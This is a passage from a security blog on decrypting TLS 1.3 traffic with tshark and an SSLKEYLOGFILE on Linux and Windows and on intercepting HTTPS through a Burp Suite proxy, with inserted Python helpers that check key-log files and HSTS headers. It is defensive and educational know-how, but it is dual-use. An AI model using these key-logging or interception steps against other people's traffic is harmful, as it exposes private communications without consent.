<span style="color: white;"><script></span>
</pre></div>
</div><div><br /></div><div><br /></div><div><div>We should recognize immediately that we are able to see the plaintext. Remember, this should all have been encrypted.</div><div><br /></div><div>With the session reassembled, we can now use our signature based analysis tools, such as your favourite IDS/IPS (for example <a href="https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html" target="_blank">Snort</a>), Network Monitoring Frameworks such as <a href="https://www.securitynik.com/2020/06/installing-zeek-314-on-ubuntu-2004.html" target="_blank">Zeek</a>, or a Next Generation Firewall, to inspect this traffic.</div></div><div><br /></div><div>Let's use <i>grep </i>as our signature based detection tool, looking for the string/pattern "<i>securitynik</i>".</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -o "tls.keylog_file: /home/kali/sslkeylog.file" -q -z follow,tls,ascii,0 | grep --perl-regexp --ignore-case "securitynik" --only-matching | sort | uniq --count</span>
<span style="color: white;">Running as user "root" and group "root". This could be dangerous.</span>
<span style="color: white;"> 308 securitynik</span>
<span style="color: white;"> 29 SecurityNik</span>
</pre></div>
</div><div><br /></div><div><div>There we go, we decrypted the traffic running over TLS 1.3.</div><div><br /></div><div>Ok! At this point, you are probably saying: but Nik, I work mostly in a Windows environment. How do I do this in Windows? Let's address this concern.</div><div><br /></div><div>Setting and verifying the environment variable on <i>Windows 11</i> under the user profile.</div><div><br /></div><div>Before setting the environment variable, let's verify that the <i>Microsoft Edge</i> browser is not running. Adding the environment variable while Edge is running sometimes seems to cause an issue.</div><div><br /></div><div>Getting the process information via both <i>cmd </i>and <i>powershell</i>, just to show different ways.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\securitynik> tasklist | findstr /i msedge </span>
<span style="color: white;">msedge.exe 7092 Console 1 98,560 K </span>
<span style="color: white;">msedge.exe 7108 Console 1 7,336 K </span>
<span style="color: white;">msedge.exe 4600 Console 1 29,444 K </span>
<span style="color: white;">msedge.exe 5592 Console 1 32,508 K </span>
<span style="color: white;">msedge.exe 2052 Console 1 18,900 K </span>
<span style="color: white;">msedge.exe 7676 Console 1 104,520 K </span>
<span style="color: white;">msedge.exe 7988 Console 1 27,212 K</span>
<span style="color: white;">PS C:\Users\securitynik> Get-Process msedge | Select-Object -Property ProcessName </span>
<span style="color: white;">ProcessName</span>
<span style="color: white;">----------- </span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge </span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge</span>
<span style="color: white;">msedge </span>
<span style="color: white;">msedge </span>
</pre></div>
</div><div><br /></div><div><div>Imagine that: all I did was start up my computer. I did not open a browser, but I have 7 instances of MSEdge running. Geez!!!</div><div><br /></div><div>Back to regular programming. Kill those processes.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> taskkill /IM msedge.exe /F </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7092 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7108 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 4600 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 5592 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 2052 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7676 has been terminated. </span>
<span style="color: white;">SUCCESS: The process "msedge.exe" with PID 7988 has been terminated.</span>
</pre></div>
</div><div><br /></div><div><div>Set the environment variable</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> setx SSLKEYLOGFILE "$(get-location)\sslkeylog_file.txt" </span>
<span style="color: white;">SUCCESS: Specified value was saved. </span>
</pre></div>
</div><div><br /></div><div><div><div>Validate in a new PowerShell or CMD window that the environment variable has been set. <i>setx</i> writes the persistent user value; the shell that ran it does not pick the new variable up, so a fresh window is needed.</div></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\SecurityNik>set|findstr /i ssl</span>
<span style="color: white;">SSLKEYLOGFILE=C:\Users\SecurityNik\sslkeylog_file.txt</span>
</pre></div>
</div><div><br /></div><div><div>With everything in place, let's use <i>Invoke-WebRequest</i> in <i>Powershell</i>, similar to what was done in <i>curl</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> Invoke-WebRequest -uri https://www.securitynik.com -OutFile index.html</span>
</pre></div>
</div><div><br /></div><div><div>What is funny in this situation is that this action did not create the file. I was very much surprised by this. Maybe more testing on my part in the future.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">PS C:\Users\Administrator> dir ssl*.*</span>
</pre></div>
</div><div><br /></div><div><div>However, if I open MSEdge, this file gets created and populated.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\Administrator>dir ssl*.* /b</span>
<span style="color: white;">sslkeylog_file.txt </span>
</pre></div>
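Before handing a key log file to tshark or Wireshark it is worth checking that it actually holds what decryption needs, because a file that exists and even grows may still contain only handshake secrets for a session. The following is an added example, not code from the original post or from any tool it uses. It assumes the NSS key log format referenced in the post's links (draft-thomson-tls-keylogfile): one record per line, label, client random and secret in hex, with '#' comments. The sample file inside the block is constructed and its secrets are not real.

```python
"""Sanity-check an SSLKEYLOGFILE before handing it to tshark or Wireshark.

Added example, not code from the original post. It assumes the NSS key log
format referenced in the post (draft-thomson-tls-keylogfile): one record per
line, "<LABEL> <client_random hex> <secret hex>", with '#' lines as comments.
The sample file below is constructed; the secrets are not real.
"""
import re
from collections import defaultdict

# TLS 1.3 writes one line per secret; both *_TRAFFIC_SECRET_0 lines are
# needed to decrypt application data in both directions.
TLS13_APP_LABELS = {"CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0"}
TLS13_LABELS = TLS13_APP_LABELS | {
    "CLIENT_EARLY_TRAFFIC_SECRET",
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET",
    "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "EXPORTER_SECRET",
}
TLS12_LABEL = "CLIENT_RANDOM"   # TLS 1.2 and earlier: 48-byte master secret
HEX = re.compile(r"^[0-9a-fA-F]+$")


def parse_keylog(text):
    """Return (entries, errors); entries are (label, client_random, secret)."""
    entries, errors = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != 3:
            errors.append(f"line {lineno}: expected 3 fields, got {len(parts)}")
            continue
        label, client_random, secret = parts
        if label not in TLS13_LABELS and label != TLS12_LABEL:
            errors.append(f"line {lineno}: unknown label {label}")
            continue
        # client_random is the 32-byte ClientHello random -> 64 hex chars
        if len(client_random) != 64 or not HEX.match(client_random):
            errors.append(f"line {lineno}: bad client_random")
            continue
        # master secret is 48 bytes; TLS 1.3 secrets are the suite's hash
        # length (32 bytes for SHA-256 suites, 48 for SHA-384 suites)
        ok_len = {96} if label == TLS12_LABEL else {64, 96}
        if len(secret) not in ok_len or not HEX.match(secret):
            errors.append(f"line {lineno}: bad secret for {label}")
            continue
        entries.append((label, client_random.lower(), secret.lower()))
    return entries, errors


def session_status(entries):
    """Map client_random -> 'tls12', 'tls13' or 'tls13-partial'."""
    labels = defaultdict(set)
    for label, client_random, _ in entries:
        labels[client_random].add(label)
    status = {}
    for client_random, have in labels.items():
        if TLS12_LABEL in have:
            status[client_random] = "tls12"
        elif TLS13_APP_LABELS <= have:
            status[client_random] = "tls13"
        else:
            # handshake secrets only: tshark can decrypt the handshake
            # but the HTTP/2 data stays opaque
            status[client_random] = "tls13-partial"
    return status


# Constructed sample: three sessions plus one malformed line.
CR_FULL, CR_PARTIAL, CR_TLS12 = "a1" * 32, "b2" * 32, "c3" * 32
SAMPLE_KEYLOG = "\n".join([
    "# constructed sample, not real session secrets",
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {CR_FULL} {'11' * 32}",
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {CR_FULL} {'22' * 32}",
    f"CLIENT_TRAFFIC_SECRET_0 {CR_FULL} {'33' * 32}",
    f"SERVER_TRAFFIC_SECRET_0 {CR_FULL} {'44' * 32}",
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {CR_PARTIAL} {'55' * 32}",
    f"CLIENT_RANDOM {CR_TLS12} {'66' * 48}",
    "CLIENT_RANDOM deadbeef tooshort",
])

if __name__ == "__main__":
    entries, errors = parse_keylog(SAMPLE_KEYLOG)
    for client_random, status in session_status(entries).items():
        print(f"{client_random[:16]}... {status}")
    for err in errors:
        print("skipped:", err)
```

A session reported as tls13-partial is the case where tshark shows a decrypted handshake but the HTTP/2 frames remain opaque; a malformed line is simply skipped by the dissector, so counting the errors tells you how much of the file is usable.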
</div><div><br /></div><div><div>If I run <i>invoke-webrequest</i> in another Terminal while Edge is running, it appends the new keys to the file. This <i>invoke-webrequest</i> will require more testing as my results are inconsistent. Not interested in this right now as everything works from within <i>MSEdge</i>.</div><div><br /></div><div>Let's wrap up this post by looking at decrypting via a proxy and a browser.</div><div><br /></div><div>In this case I am using <i>Burp Suite Community Edition</i> for my proxy.</div></div><div><br /></div><div>------ BurpProxy On image ------</div><div><br /></div><div><div>Validate that the proxy is listening via <i>ss</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ss --numeric --listening --tcp --processes </span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process </span>
<span><b><span style="color: #fcff01;">LISTEN </span></b><span style="color: white;">0 50 </span><b><span style="color: #fcff01;">[::ffff:127.0.0.1]</span></b><span style="color: white;">:</span></span><span style="color: #fcff01;"><b>8080</b></span><span style="color: white;"> *:* users:(("java",pid=210127,fd=26)) </span>
</pre></div>
</div><div><br /></div><div><div>Configure the browser to use the proxy.</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rcOQhLZY2b4aGPXAn2PluxYIKy5S9_-cQPNQ-d_YEbm3G4LgScNK4Beod2HIHpZaIJKecSkm7BqLNsmPm28dk9tpRwVNEPqardz_WCbYBaJPEHres1nOl5bYpzw3cq1U5PMv00-gQUK7BDjvO42-q2PIW5rlyvU2sC6RrjbczeLj0y-7DgJEN7kyEUs/s828/burpe-browser-proxy-config.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="828" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rcOQhLZY2b4aGPXAn2PluxYIKy5S9_-cQPNQ-d_YEbm3G4LgScNK4Beod2HIHpZaIJKecSkm7BqLNsmPm28dk9tpRwVNEPqardz_WCbYBaJPEHres1nOl5bYpzw3cq1U5PMv00-gQUK7BDjvO42-q2PIW5rlyvU2sC6RrjbczeLj0y-7DgJEN7kyEUs/w640-h528/burpe-browser-proxy-config.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both;">In my browser, I try to go to <i>https://www.securitynik.com</i> and I see the request is intercepted by the proxy. 
</div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrEnJ6M3122BHOI50pfvbkUaRzsp6CtA0paBSthIugWTA2UBjTQsO9PYtoDt1Tuz0t-VqrqmyA-ri7TvfIKqTX8mmWHuqcHkdTx0uvh0utBWtLihwR5mnJhALIVWgtuF4KraIXOV08ow6G0LURWdvgDy2X--2wQVaOi4BMDvxtHRZG2b0gdH39qa1Q5ls/s891/burpe-browser-error-securitynik.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="718" data-original-width="891" height="516" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrEnJ6M3122BHOI50pfvbkUaRzsp6CtA0paBSthIugWTA2UBjTQsO9PYtoDt1Tuz0t-VqrqmyA-ri7TvfIKqTX8mmWHuqcHkdTx0uvh0utBWtLihwR5mnJhALIVWgtuF4KraIXOV08ow6G0LURWdvgDy2X--2wQVaOi4BMDvxtHRZG2b0gdH39qa1Q5ls/w640-h516/burpe-browser-error-securitynik.PNG" width="640" /></a></div><br /><div><br /></div></div><div>At this point, some people may click "Advanced" and "Accept the Risk and Continue" to get past the certificate error. That could be a bad move: this warning is exactly what a man-in-the-middle looks like from the browser's side. Let's do so anyway for the purpose of this blog post. 
With the risk accepted, forward the intercepted request within the proxy ...</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGGx0wGZCiJEZdLC2BjDpU1nNgPlhKfnP2_WZXq-Q6ZA34MGk4fOtzAHXNqtH_c6t7L_psIqNk3YYB3szFOXgwVk9iMNC8NZsDA5CYPk90NbQAFY8sQdhKKzzUS5BUHj7dmMcusDGRqhONoKiXhcrehpisgfGuDp5XeZ2OBXCMeA9sCSPWC3BjxkEv_7E/s993/burpe-accepting-the-risk.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="993" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGGx0wGZCiJEZdLC2BjDpU1nNgPlhKfnP2_WZXq-Q6ZA34MGk4fOtzAHXNqtH_c6t7L_psIqNk3YYB3szFOXgwVk9iMNC8NZsDA5CYPk90NbQAFY8sQdhKKzzUS5BUHj7dmMcusDGRqhONoKiXhcrehpisgfGuDp5XeZ2OBXCMeA9sCSPWC3BjxkEv_7E/w640-h306/burpe-accepting-the-risk.PNG" width="640" /></a></div><div><br /></div><div>... and now, because we forwarded the request, we also see the response in clear text in Burp.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXI0gvnnU4exC7djRZ43Ut5CQegCTLpkBOkS4ba6aACsGwfnd3Gs-qqg7VmM19wCyuapBuPb7bEqLqF8xHhZiY0IuNvRapy80Vw-T2do_Qrq4RSrO-_SC1RQkwrR7v4mnwV_cy3QTCk1zL10KOsiGzrM0ZRLmTJ_4I-dVqLLPFp6PoQPtrceZN7c4o4k0/s983/burpe-seeing-the-clear-traffic-on-proxy.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="814" data-original-width="983" height="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXI0gvnnU4exC7djRZ43Ut5CQegCTLpkBOkS4ba6aACsGwfnd3Gs-qqg7VmM19wCyuapBuPb7bEqLqF8xHhZiY0IuNvRapy80Vw-T2do_Qrq4RSrO-_SC1RQkwrR7v4mnwV_cy3QTCk1zL10KOsiGzrM0ZRLmTJ_4I-dVqLLPFp6PoQPtrceZN7c4o4k0/w640-h530/burpe-seeing-the-clear-traffic-on-proxy.PNG" width="640" /></a></div><br /><div><br /></div><div><div>While I captured the traffic from my blog, the takeaway for you is: once a proxy is in place, the traffic can not only be seen but also manipulated. This is true even if TLS is in use.</div><div><br /></div><div>But what about HTTP Strict Transport Security (HSTS)?</div><div><br /></div><div>HSTS is a response header sent by the server stating that the site should only be accessed using HTTPS. HSTS can be used to mitigate the risk of man-in-the-middle types of attacks.</div><div><br /></div><div>The browser reports that the site supports HSTS, and thus if we wanted to access that site through the proxy, we would have to create an exception. 
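How much protection HSTS gives depends on what the server actually sends in the header. The following is an added example, not code from the original post, that parses a Strict-Transport-Security value and flags the weak cases. It follows the RFC 6797 directive rules (max-age required, names case-insensitive, a repeated directive invalidates the header, max-age=0 clears the cached policy); the 'preload' token is the preload list convention from the chromium.org and hstspreload.org references rather than an RFC directive. The header values in the block are constructed.

```python
"""Evaluate a Strict-Transport-Security header value.

Added example, not code from the original post. It follows the RFC 6797
directive rules: max-age is required, directive names are case-insensitive,
a repeated directive makes the header invalid, and max-age=0 tells the
browser to drop its cached policy for the host. 'preload' is the preload
list convention (chromium.org / hstspreload.org), not an RFC 6797
directive. The sample header values are constructed.
"""

ONE_YEAR = 31536000


def parse_hsts(value):
    """Return {directive_name_lowercase: value_or_None}; raise on duplicates."""
    directives = {}
    for token in value.split(";"):
        token = token.strip()
        if not token:
            continue
        name, sep, val = token.partition("=")
        name = name.strip().lower()
        val = val.strip().strip('"') if sep else None   # quoted values are allowed
        if name in directives:
            raise ValueError(f"duplicate directive: {name}")
        directives[name] = val
    return directives


def evaluate_hsts(value, min_age=ONE_YEAR):
    """Return (verdict, findings); verdict is invalid, disabled, weak or strong."""
    try:
        directives = parse_hsts(value)
    except ValueError as exc:
        return "invalid", [str(exc)]
    if "max-age" not in directives:
        return "invalid", ["max-age missing: browsers ignore the header"]
    try:
        max_age = int(directives["max-age"])
    except (TypeError, ValueError):
        return "invalid", ["max-age is not an integer"]
    if max_age < 0:
        return "invalid", ["max-age is negative"]
    if max_age == 0:
        return "disabled", ["max-age=0 removes the cached policy for this host"]

    findings = []
    if max_age < min_age:
        findings.append(f"max-age {max_age} is below {min_age} (one year)")
    if "includesubdomains" not in directives:
        findings.append("includeSubDomains missing: subdomains may still be reached over HTTP")
    if "preload" not in directives:
        findings.append("preload missing: the very first visit is not protected")
    return ("strong" if not findings else "weak"), findings


# Constructed header values covering the common cases.
SAMPLE_HEADERS = {
    "strong": "max-age=63072000; includeSubDomains; preload",
    "short-lived": "max-age=300",
    "removal": "max-age=0",
    "no-max-age": "includeSubDomains",
    "duplicate": "max-age=100; max-age=200",
}

if __name__ == "__main__":
    for name, header in SAMPLE_HEADERS.items():
        verdict, findings = evaluate_hsts(header)
        print(f"{name:12s} {verdict:8s} {header}")
        for finding in findings:
            print("    -", finding)
```

One caveat the checker cannot see: browsers only honour the header when it arrives over an HTTPS connection with no certificate errors, so a policy is only as good as the first clean HTTPS response the client ever received, which is the gap the preload list closes.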
</div><div><br /></div><div><br /></div><div>References:</div><div><a href="https://developer.mozilla.org/en-US/docs/Web/Security/Transport_Layer_Security">Transport Layer Security - Security on the web | MDN (mozilla.org)</a></div><div><a href="https://wiki.mozilla.org/Security/Server_Side_TLS">Security/Server Side TLS - MozillaWiki</a></div><div><a href="https://datatracker.ietf.org/doc/html/rfc2246">RFC 2246 - The TLS Protocol Version 1.0 (ietf.org)</a></div><div><a href="https://superuser.com/questions/606598/specifying-minor-tls-version-when-using-curl">Specifying minor TLS version when using curl - Super User</a></div><div><a href="https://serverfault.com/questions/910177/what-is-the-meaning-of-the-values-of-the-protocols-field-from-get-tlsciphersuite">windows - What is the meaning of the values of the Protocols field from Get-TlsCipherSuite Output? - Server Fault</a></div><div><a href="https://security.stackexchange.com/questions/29314/what-is-the-significance-of-the-version-field-in-a-tls-1-1-clienthello-message">protocols - What is the significance of the version field in a TLS 1.1+ ClientHello message? 
- Information Security Stack Exchange</a></div><div><a href="https://github.com/tintinweb/scapy-ssl_tls/blob/eb6df1c940527e65e3f16c662836d7382ba4ace0/scapy_ssl_tls/ssl_tls.py#L241">scapy-ssl_tls/scapy_ssl_tls/ssl_tls.py at eb6df1c940527e65e3f16c662836d7382ba4ace0 · tintinweb/scapy-ssl_tls (github.com)</a></div><div><a href="https://www.youtube.com/watch?v=yPdJVvSyMqk">TLS 1.3 Handshake - YouTube</a></div><div><a href="https://www.youtube.com/watch?v=grRi-aFrbSE">Stanford Seminar - The TLS 1.3 Protocol - YouTube</a></div><div><a href="https://www.ietf.org/archive/id/draft-thomson-tls-keylogfile-00.html">The SSLKEYLOGFILE Format for TLS (ietf.org)</a></div><div><a href="https://my.f5.com/manage/s/article/K50557518">Decrypt SSL traffic with the SSLKEYLOGFILE environment variable on Firefox or Google Chrome using Wireshark (f5.com)</a></div><div><a href="https://www.ietf.org/archive/id/draft-thomson-tls-keylogfile-00.html">The SSLKEYLOGFILE Format for TLS (ietf.org)</a></div><div><a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1">set | Microsoft Learn</a></div><div><a href="https://tshark.dev/export/export_tls/">Tshark | TLS Encrypted</a><br /><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security">Strict-Transport-Security - HTTP | MDN (mozilla.org)</a></div><div><a href="https://www.chromium.org/hsts/">HTTP Strict Transport Security (chromium.org)</a></div><div><a href="https://hstspreload.org/">HSTS Preload List Submission</a></div><div><a href="https://www.acunetix.com/blog/articles/what-is-hsts-why-use-it/">What Is HSTS and Why Should I Use It? | Acunetix</a></div><div><a href="https://cheapsslsecurity.com/blog/tls-versions-what-they-are-and-which-ones-are-still-supported/">TLS Versions: What They Are and Which Ones Are Still Supported? 
(cheapsslsecurity.com)</a></div><div><a href="https://www.youtube.com/watch?v=25_ftpJ-2ME">TLS Handshake Deep Dive and decryption with Wireshark - YouTube</a></div></div><div><a href="https://www.youtube.com/watch?v=HMoFvRK4HUo&list=PLIFyRwBY_4bTwRX__Zn4-letrtpSj1mzY">What is SSL & TLS ? What is HTTPS ? What is an SSL VPN? - Practical TLS - YouTube</a></div><div><a href="https://developers.google.com/tink/aead">Authenticated Encryption with Associated Data (AEAD) | Tink | Google for Developers</a><br /><a href="https://stackoverflow.com/questions/7285059/hmac-sha1-in-bash">HMAC-SHA1 in bash - Stack Overflow</a><br /><a href="https://linuxwebdevelopment.com/encrypt-files-openssl/">How To Encrypt Files With OpenSSL (linuxwebdevelopment.com)</a><br /><a href="https://stackoverflow.com/questions/16056135/how-to-use-openssl-to-encrypt-decrypt-files">encryption - How to use OpenSSL to encrypt/decrypt files? - Stack Overflow</a><br /><a href="https://cheapsslsecurity.com/blog/tls-versions-what-they-are-and-which-ones-are-still-supported/">TLS Versions: What They Are and Which Ones Are Still Supported? (cheapsslsecurity.com)</a></div></div></div></div><div><a href="https://www.youtube.com/watch?v=ZkL10eoG1PY">TLS Handshake - EVERYTHING that happens when you visit an HTTPS website - YouTube</a></div><div><a href="https://www.youtube.com/watch?v=HMoFvRK4HUo&list=PLIFyRwBY_4bTwRX__Zn4-letrtpSj1mzY">What is SSL & TLS ? What is HTTPS ? What is an SSL VPN? 
- Practical TLS - YouTube</a></div><div><br /></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-20233637054436200822023-05-29T16:38:00.004-07:002024-03-18T07:36:43.722-07:00Beginning Machine and Deep Learning with Zeek logs<p><b><span style="font-size: large;">Why this series?</span></b></p><p>When teaching the <b>SANS SEC595: Applied Data Science and Machine Learning for Cybersecurity Professionals </b><a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/">https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/</a> I am always asked,</p><p>"<i>Will you be sharing your demo notebooks?</i>" or "<i>Can we get a copy of your demo notebooks?</i>" or ... well, you get the point.</p><p>My answer is always no. Not that I do not want to share (sharing is caring :-D), but the demo notebooks by themselves would not make sense or add real value. Hence, this series! </p><p>This is my supplemental work, similar to what I would do in the demos but with a lot more details and references.</p><p>This series primarily uses Zeek's conn.log file. Notebooks 23 and 24 use Zeek's DNS and HTTP logs respectively. </p>
The series includes the following: <br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/01%20-%20beginning%20numpy.ipynb" target="_blank">01 - Beginning Numpy</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/02%20-%20beginning%20tensorflow.ipynb" target="_blank">02 - Beginning Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/03%20-%20beginning%20torch.ipynb" target="_blank">03 - Beginning PyTorch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/04%20-%20Beginning%20Pandas.ipynb" target="_blank">04 - Beginning Pandas</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/05%20-%20beginning%20matplotlib.ipynb" target="_blank">05 - Beginning Matplotlib</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/06%20-%20Beginning%20Data%20Scaling.ipynb" target="_blank">06 - Beginning Data Scaling</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/07%20-%20Beginning%20Principal%20Component%20Analysis%20(PCA).ipynb" target="_blank">07 - Beginning Principal Component Analysis (PCA)</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/08%20-%20beginning%20Machine%20Learning%20Anomaly%20Detection%20-%20isolation%20forest%20and%20local%20outlier%20factor.ipynb" target="_blank">08 - Beginning Machine Learning Anomaly Detection - Isolation Forest 
and Local Outlier Factor</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/09%20-%20Beginning%20Unsupervised%20Machine%20Learning%20-%20Clustering%20-%20K-means%20and%20DBSCAN%20-%20version%202.ipynb" target="_blank">09 - Beginning Unsupervised Machine Learning - Clustering - K-means and DBSCAN</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/10%20-%20Beginning%20Supervise%20Learning%20-%20Machine%20Learning%20-%20Logistic%20Regression%2C%20Decision%20Trees%20and%20Metrics.ipynb" target="_blank">
10 - Beginning Supervise Learning - Machine Learning - Logistic Regression, Decision Trees and Metrics <br /></a><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/11%20-%20Beginning%20Linear%20Regression%20-%20Machine%20Learning.ipynb" target="_blank">11 - Beginning Linear Regression - Machine Learning</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/12%20-%20Beginning%20Deep%20Learning%20-%20Anomaly%20Detection%20with%20AutoEncoders%2C%20Tensorflow.ipynb" target="_blank">12 - Beginning Deep Learning - Anomaly Detection with AutoEncoders, Tensorflow</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/13%20-%20Beginning%20Deep%20Learning%20-%20Anomaly%20Detection%20with%20AutoEncoders%2C%20PyTroch.ipynb" target="_blank">13 - Beginning Deep Learning - Anomaly Detection with AutoEncoders, PyTroch</a><br /><a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Machine%20and%20Deep%20Learning%20with%20Zeek%20logs/14.%20-%20Beginning%20Deep%20Learning%2C%20-%20Linear%20Regression%2C%20Tensorflow.ipynb" target="_blank">14 - Beginning Deep Learning - Linear Regression, Tensorflow</a><br /><a 